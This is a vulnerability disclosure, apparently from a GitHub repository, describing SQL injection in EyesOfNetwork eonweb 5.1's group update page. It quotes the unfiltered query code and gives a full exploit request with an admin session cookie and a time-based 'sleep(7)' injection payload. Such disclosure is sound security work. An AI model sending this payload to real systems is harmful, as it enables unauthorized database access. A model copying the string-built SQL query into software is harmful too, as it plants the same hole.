Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Eonweb_module_admin_group_add_modify_group.php function update_group has SQL injection vulnerability
Powered by Shaojie Jiang from 360 SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
# 0x01
module/admin_group/add_modify_group.php Line 126
if($group_name!=$old_group)
$group_exist=mysqli_result(sqlrequest("$database_eonweb","SELECT count('group_name') from groups where group_name='$group_name';"),0);
else
$group_exist=0;
$group_name has not been filtered to cause SQL injection vulnerability
EXP:
POST https://192.168.242.128/module/admin_group/add_modify_group.php HTTP/1.1
Host: 192.168.242.128
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Referer: https://192.168.242.128/module/admin_group/add_modify_group.php?group_id=2
Cookie: session_id=569707101; user_name=admin; user_id=1; user_limitation=0; group_id=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
group_id=2&group_name=jjj' and sleep(7)#&group_descr=2222222&tab_1=1&tab_2=1&tab_3=1&tab_4=1&tab_5=1&tab_6=1&tab_7=1&update=update
The page will be delayed for 7 seconds
-------------------------------------------